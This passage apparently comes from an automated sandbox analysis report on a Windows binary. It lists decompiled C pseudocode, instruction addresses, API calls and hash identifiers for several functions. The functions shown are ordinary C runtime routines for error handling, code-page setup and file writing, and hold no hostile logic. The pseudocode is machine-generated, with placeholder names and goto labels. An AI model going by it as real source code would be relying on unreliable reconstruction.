					_t31 = E00AB6453(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















        0x00ab4c4a
        0x00ab4c4a
        0x00ab4c4a
        0x00ab4c54
        0x00ab4c56
        0x00ab4c5b
        0x00ab4c5e
        0x00ab4c6c
        0x00ab4c73
        0x00ab4c78
        0x00ab4c7b
        0x00ab4c7e
        0x00ab4c90
        0x00ab4c95
        0x00ab4c97
        0x00ab4ca2
        0x00ab4ca9
        0x00ab4cae
        0x00ab4cb1
        0x00ab4cb3
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00ab4c99
        0x00ab4c99
        0x00000000
        0x00ab4c99
        0x00ab4c80
        0x00ab4c80
        0x00ab4c81
        0x00ab4c81
        0x00ab4c86
        0x00ab4cc1
        0x00ab4cc2
        0x00ab4cc8
        0x00ab4ccd
        0x00ab4cd0
        0x00ab4cd1
        0x00ab4cd2
        0x00ab4cd9
        0x00ab4cdb
        0x00ab4cdd
        0x00ab4ce2
        0x00ab4ce5
        0x00ab4cf3
        0x00ab4cff
        0x00ab4d02
        0x00ab4d05
        0x00ab4d17
        0x00ab4d1c
        0x00ab4d1e
        0x00ab4d29
        0x00ab4d2f
        0x00ab4d37
        0x00ab4d39
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00ab4d20
        0x00ab4d20
        0x00000000
        0x00ab4d20
        0x00ab4d07
        0x00ab4d07
        0x00ab4d08
        0x00ab4d08
        0x00ab4d3b
        0x00ab4d3c
        0x00ab4d3c
        0x00ab4ce7
        0x00ab4ced
        0x00ab4cf1
        0x00ab4d44
        0x00ab4d45
        0x00ab4d4b
        0x00000000
        0x00000000
        0x00000000
        0x00ab4cf1
        0x00ab4d52
        0x00ab4d52
        0x00ab4c60
        0x00ab4c66
        0x00ab4c6a
        0x00ab4cb5
        0x00ab4cb6
        0x00ab4cc0
        0x00000000
        0x00000000
        0x00000000
        0x00ab4c6a

        APIs
        • GetLastError.KERNEL32(?,?,00AB464B,00AC1E70,0000000C,00AB2746), ref: 00AB4C4E
        • SetLastError.KERNEL32(00000000), ref: 00AB4CB6
        • SetLastError.KERNEL32(00000000), ref: 00AB4CC2
        • _abort.LIBCMT ref: 00AB4CC8
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ErrorLast$_abort
        • String ID:
        • API String ID: 88804580-0
        • Opcode ID: 8ebf3028cbc929c269ea01d3bca9669f9725a04cc34bf9426630a8e165f4b99c
        • Instruction ID: a35b511e0197969b76eaa4ec13a15188ccab295f408cc735e0ba557627417b90
        • Opcode Fuzzy Hash: 8ebf3028cbc929c269ea01d3bca9669f9725a04cc34bf9426630a8e165f4b99c
        • Instruction Fuzzy Hash: 43F0283A1056007ACA12B3756F0AFEB2E6D8FCBF30F224218F915962A3FF25C8034060
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB2C96 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00AB2C96() {
				void* _t4;
				void* _t8;

				E00AB3315();
				E00AB32A9();
				if(E00AB3009() != 0) {
					_t4 = E00AB2FBB(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00AB3045();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





        0x00ab2c96
        0x00ab2c9b
        0x00ab2ca7
        0x00ab2cac
        0x00ab2cb1
        0x00ab2cb3
        0x00ab2cbe
        0x00ab2cb5
        0x00ab2cb5
        0x00000000
        0x00ab2cb5
        0x00ab2ca9
        0x00ab2ca9
        0x00ab2cab
        0x00ab2cab

        APIs
        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00AB2C96
        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00AB2C9B
        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00AB2CA0
          • Part of subcall function 00AB3009: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00AB301A
        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00AB2CB5
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
        • String ID:
        • API String ID: 1761009282-0
        • Opcode ID: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
        • Instruction ID: 8d4277f4a2f4a72fb870928ebd46e8bfab04a62e322e92ff7d39847fe4f90da0
        • Opcode Fuzzy Hash: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
        • Instruction Fuzzy Hash: AAC09226010289A42C603BB22B073FE2B6C0EA37C4B9015C7FD512B02BDD0B070A6333
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB5A7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
        Download Yara Rule
        C-Code - Quality: 92%
        			E00AB5A7A(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0xac3018; // 0x4c695d09
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E00AB564D(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xac3058)) - _t78;
						if( *((intOrPtr*)(_t51 + 0xac3058)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xac3d3c - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00AB56C0(_t98);
												goto L37;
											}
										} else {
											E00AB2CE0(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E00AB560F( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00AB5725(_t78, _t91, _t95, _t98, _t98);
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00AB2CE0(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xac3068;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0xac3050; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E00AB560F(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0xac305c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E00AB56C0(_t98);
				}
				L39:
				return E00AB29BB(_v8 ^ _t99);
			}






























        0x00ab5a82
        0x00ab5a89
        0x00ab5a91
        0x00ab5a99
        0x00ab5a9e
        0x00ab5aaf
        0x00ab5aaf
        0x00ab5ab1
        0x00ab5ab3
        0x00ab5ab5
        0x00ab5ab8
        0x00ab5ab8
        0x00ab5abe
        0x00000000
        0x00000000
        0x00ab5ac4
        0x00ab5ac5
        0x00ab5ac8
        0x00ab5acb
        0x00ab5ad0
        0x00000000
        0x00ab5ad2
        0x00ab5ad2
        0x00ab5ad8
        0x00ab5ba6
        0x00ab5ade
        0x00ab5ade
        0x00ab5ae4
        0x00000000
        0x00ab5aea
        0x00ab5aee
        0x00ab5af4
        0x00ab5af6
        0x00000000
        0x00ab5afc
        0x00ab5b01
        0x00ab5b07
        0x00ab5b09
        0x00ab5b93
        0x00ab5b99
        0x00000000
        0x00ab5b9b
        0x00ab5b9c
        0x00000000
        0x00ab5b9c
        0x00ab5b0f
        0x00ab5b19
        0x00ab5b1e
        0x00ab5b26
        0x00ab5b2c
        0x00ab5b2d
        0x00ab5b30
        0x00ab5b83
        0x00ab5b32
        0x00ab5b32
        0x00ab5b36
        0x00ab5b39
        0x00ab5b3b
        0x00ab5b3b
        0x00ab5b3e
        0x00ab5b40
        0x00000000
        0x00000000
        0x00ab5b42
        0x00ab5b45
        0x00ab5b50
        0x00ab5b50
        0x00ab5b52
        0x00000000
        0x00000000
        0x00ab5b4a
        0x00ab5b4f
        0x00ab5b4f
        0x00ab5b4f
        0x00ab5b54
        0x00ab5b57
        0x00ab5b5a
        0x00000000
        0x00000000
        0x00000000
        0x00ab5b5a
        0x00ab5b3b
        0x00ab5b5c
        0x00ab5b5c
        0x00ab5b5f
        0x00ab5b64
        0x00ab5b64
        0x00ab5b67
        0x00ab5b68
        0x00ab5b68
        0x00ab5b68
        0x00ab5b78
        0x00ab5b7e
        0x00ab5b7e
        0x00ab5b88
        0x00ab5b8b
        0x00ab5b8c
        0x00ab5b8d
        0x00ab5c51
        0x00ab5c52
        0x00ab5c57
        0x00ab5c58
        0x00ab5c58
        0x00ab5b09
        0x00ab5af6
        0x00ab5ae4
        0x00ab5ad8
        0x00000000
        0x00ab5c5a
        0x00ab5bb8
        0x00ab5bc0
        0x00ab5bc0
        0x00ab5bc4
        0x00ab5bc7
        0x00ab5bcd
        0x00ab5bd0
        0x00ab5bd0
        0x00ab5bd3
        0x00ab5bd5
        0x00ab5bd7
        0x00ab5bd7
        0x00ab5bda
        0x00ab5bdc
        0x00000000
        0x00000000
        0x00ab5bde
        0x00ab5be1
        0x00ab5bfd
        0x00ab5bfd
        0x00ab5bff
        0x00000000
        0x00000000
        0x00ab5be6
        0x00ab5bec
        0x00ab5bee
        0x00ab5bf4
        0x00ab5bf8
        0x00ab5bf8
        0x00ab5bf9
        0x00000000
        0x00ab5bf9
        0x00000000
        0x00ab5bec
        0x00ab5c01
        0x00ab5c04
        0x00ab5c07
        0x00000000
        0x00000000
        0x00000000
        0x00ab5c07
        0x00ab5c09
        0x00ab5c09
        0x00ab5c0c
        0x00ab5c0d
        0x00ab5c10
        0x00ab5c13
        0x00ab5c13
        0x00ab5c19
        0x00ab5c1c
        0x00ab5c2b
        0x00ab5c34
        0x00ab5c39
        0x00ab5c3f
        0x00ab5c40
        0x00ab5c40
        0x00ab5c43
        0x00ab5c46
        0x00ab5c49
        0x00ab5c4c
        0x00ab5c4c
        0x00ab5c4c
        0x00000000
        0x00ab5aa0
        0x00ab5aa1
        0x00ab5aa7
        0x00ab5c5b
        0x00ab5c6a

        APIs
          • Part of subcall function 00AB564D: GetOEMCP.KERNEL32(00000000,?,?,00AB58D6,?), ref: 00AB5678
        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00AB591B,?,00000000), ref: 00AB5AEE
        • GetCPInfo.KERNEL32(00000000,00AB591B,?,?,?,00AB591B,?,00000000), ref: 00AB5B01
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: CodeInfoPageValid
        • String ID: ]iL
        • API String ID: 546120528-4085116960
        • Opcode ID: 5830399fa533155fb2a3f6973bcce9061dcf7f8e60001f0dcf9cbda83ae631ef
        • Instruction ID: 7835ab562b1ea8f809c0e6db0978697d506f7e8e4c8ecdf323a375747eafef03
        • Opcode Fuzzy Hash: 5830399fa533155fb2a3f6973bcce9061dcf7f8e60001f0dcf9cbda83ae631ef
        • Instruction Fuzzy Hash: 56513271E00B459EDB259F71C891BFABBFDEF42300F18446ED0868B253E6359942CB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB5725 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
        Download Yara Rule
        C-Code - Quality: 96%
        			E00AB5725(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0xac3018; // 0x4c695d09
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0xab5d70
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0xab5d70
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E00AB6E4E(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0xc8358959
					E00AB8A70(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0);
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0xc8358959
					E00AB8A70(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E00AB29BB(_v8 ^ _t102);
			}































        0x00ab5725
        0x00ab5730
        0x00ab5737
        0x00ab573c
        0x00ab5747
        0x00ab5759
        0x00ab5851
        0x00ab5851
        0x00ab5857
        0x00ab5859
        0x00ab585a
        0x00ab585a
        0x00ab585c
        0x00ab5862
        0x00ab5862
        0x00ab5864
        0x00ab5866
        0x00ab586f
        0x00ab5872
        0x00ab587e
        0x00ab5885
        0x00ab5895
        0x00ab5887
        0x00ab5887
        0x00ab588a
        0x00ab588a
        0x00ab588a
        0x00ab588e
        0x00ab588e
        0x00000000
        0x00ab588e
        0x00ab5874
        0x00ab5874
        0x00ab5879
        0x00ab5879
        0x00ab5891
        0x00ab5891
        0x00ab5891
        0x00ab5897
        0x00ab589d
        0x00ab589d
        0x00ab58a3
        0x00ab58a4
        0x00ab58a4
        0x00ab575f
        0x00ab575f
        0x00ab5761
        0x00ab5761
        0x00ab5768
        0x00ab5769
        0x00ab576d
        0x00ab5773
        0x00ab5779
        0x00ab57a1
        0x00ab57a1
        0x00ab57a3
        0x00000000
        0x00000000
        0x00ab5782
        0x00ab5786
        0x00ab5798
        0x00ab5798
        0x00ab579a
        0x00000000
        0x00000000
        0x00ab578b
        0x00ab578d
        0x00ab578f
        0x00ab5797
        0x00ab5797
        0x00000000
        0x00ab5797
        0x00000000
        0x00ab578d
        0x00ab579c
        0x00ab579c
        0x00ab579f
        0x00ab579f
        0x00ab57a6
        0x00ab57bb
        0x00ab57c1
        0x00ab57d5
        0x00ab57dc
        0x00ab57eb
        0x00ab57fd
        0x00ab5804
        0x00ab580c
        0x00ab580e
        0x00ab580e
        0x00ab5818
        0x00ab5828
        0x00ab582a
        0x00ab5841
        0x00ab582c
        0x00ab582c
        0x00ab582c
        0x00ab582c
        0x00ab5831
        0x00000000
        0x00ab5831
        0x00ab581a
        0x00ab581a
        0x00ab581f
        0x00ab5838
        0x00ab5838
        0x00ab5838
        0x00ab5848
        0x00ab5849
        0x00ab584d
        0x00ab58b8

        APIs
        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00AB574A
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: Info
        • String ID: ]iL$
        • API String ID: 1807457897-2741433938
        • Opcode ID: 6008e244ac3ab8894b28efba6d9eff838f5d1ef8f25661665fe2ce6324800a45
        • Instruction ID: db97b2880ecd199d012e5b12de3cd7ae48ac851ab3af6dda2caabd15d31279e0
        • Opcode Fuzzy Hash: 6008e244ac3ab8894b28efba6d9eff838f5d1ef8f25661665fe2ce6324800a45
        • Instruction Fuzzy Hash: 7641F9709046989FDF228B75CC84BFABBBDEB45308F1408EDE58A86143D2359A45DF60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB9A22 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON
        Download Yara Rule
        C-Code - Quality: 82%
        			E00AB9A22(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v10;
				void _v5128;
				intOrPtr _v5132;
				long _v5136;
				void* _v5140;
				signed int _t29;
				intOrPtr _t35;
				long _t43;
				signed int _t44;
				signed short* _t47;
				void* _t52;
				signed int _t56;
				signed int* _t58;
				long _t60;
				intOrPtr* _t63;
				signed int _t65;

				E00ABC1B0();
				_t29 =  *0xac3018; // 0x4c695d09
				_v8 = _t29 ^ _t65;
				_t49 = _a8;
				_t47 = _a12;
				_t63 = _a4;
				_t52 =  *( *((intOrPtr*)(0xac3f60 + (_a8 >> 6) * 4)) + 0x18 + (_t49 & 0x0000003f) * 0x30);
				_t35 = _a16 + _t47;
				_v5140 = _t52;
				_v5132 = _t35;
				 *_t63 = 0;
				 *((intOrPtr*)(_t63 + 4)) = 0;
				 *((intOrPtr*)(_t63 + 8)) = 0;
				while(_t47 < _t35) {
					_t58 =  &_v5128;
					while(_t47 < _t35) {
						_t44 =  *_t47 & 0x0000ffff;
						_t47 =  &(_t47[1]);
						if(_t44 == 0xa) {
							 *((intOrPtr*)(_t63 + 8)) =  *((intOrPtr*)(_t63 + 8)) + 2;
							_t56 = 0xd;
							 *_t58 = _t56;
							_t58 =  &(_t58[0]);
						}
						 *_t58 = _t44;
						_t58 =  &(_t58[0]);
						_t35 = _v5132;
						if(_t58 <  &_v10) {
							continue;
						}
						break;
					}
					_t60 = _t58 -  &_v5128 & 0xfffffffe;
					if(WriteFile(_t52,  &_v5128, _t60,  &_v5136, 0) == 0) {
						 *_t63 = GetLastError();
					} else {
						_t43 = _v5136;
						 *((intOrPtr*)(_t63 + 4)) =  *((intOrPtr*)(_t63 + 4)) + _t43;
						if(_t43 >= _t60) {
							_t35 = _v5132;
							_t52 = _v5140;
							continue;
						}
					}
					L12:
					return E00AB29BB(_v8 ^ _t65);
				}
				goto L12;
			}




















        0x00ab9a2c
        0x00ab9a31
        0x00ab9a38
        0x00ab9a3b
        0x00ab9a4a
        0x00ab9a55
        0x00ab9a59
        0x00ab9a60
        0x00ab9a62
        0x00ab9a6a
        0x00ab9a70
        0x00ab9a72
        0x00ab9a75
        0x00ab9aef
        0x00ab9a7a
        0x00ab9a80
        0x00ab9a84
        0x00ab9a87
        0x00ab9a8d
        0x00ab9a8f
        0x00ab9a95
        0x00ab9a96
        0x00ab9a99
        0x00ab9a99
        0x00ab9a9c
        0x00ab9aa2
        0x00ab9aa7
        0x00ab9aad
        0x00000000
        0x00000000
        0x00000000
        0x00ab9aad
        0x00ab9ac0
        0x00ab9ad4
        0x00ab9afb
        0x00ab9ad6
        0x00ab9ad6
        0x00ab9adc
        0x00ab9ae1
        0x00ab9ae3
        0x00ab9ae9
        0x00000000
        0x00ab9ae9
        0x00ab9ae1
        0x00ab9afd
        0x00ab9b0f
        0x00ab9b0f
        0x00000000

        APIs
        • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00AB9E5F,?,00000000,?,00000000,00000000), ref: 00AB9ACC
        • GetLastError.KERNEL32(?,00AB9E5F,?,00000000,?,00000000,00000000,?,00000000), ref: 00AB9AF5
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: ]iL
        • API String ID: 442123175-4085116960
        • Opcode ID: c2e3571628eb9a93032e64d0c4b7d6b40a1e2f54a29eba5c1faaf350467d06c0
        • Instruction ID: 88c4f1a824381f83444cb31ecfbb8dafd7a0dbef36c287799d225329e0d964d7
        • Opcode Fuzzy Hash: c2e3571628eb9a93032e64d0c4b7d6b40a1e2f54a29eba5c1faaf350467d06c0
        • Instruction Fuzzy Hash: 06318771A00215DBCB24CF5ACD80ADAB3F9FF48350F2085AEE50AD7251E730AD82CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB9943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
        Download Yara Rule
        C-Code - Quality: 82%
        			E00AB9943(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				void _v5128;
				intOrPtr _v5132;
				long _v5136;
				void* _v5140;
				signed int _t31;
				intOrPtr _t37;
				long _t45;
				char _t46;
				intOrPtr* _t49;
				void* _t54;
				char* _t58;
				long _t59;
				signed int* _t62;
				signed int _t64;

				E00ABC1B0();
				_t31 =  *0xac3018; // 0x4c695d09
				_v8 = _t31 ^ _t64;
				_t51 = _a8;
				_t49 = _a12;
				_t62 = _a4;
				_t54 =  *( *((intOrPtr*)(0xac3f60 + (_a8 >> 6) * 4)) + 0x18 + (_t51 & 0x0000003f) * 0x30);
				 *_t62 =  *_t62 & 0x00000000;
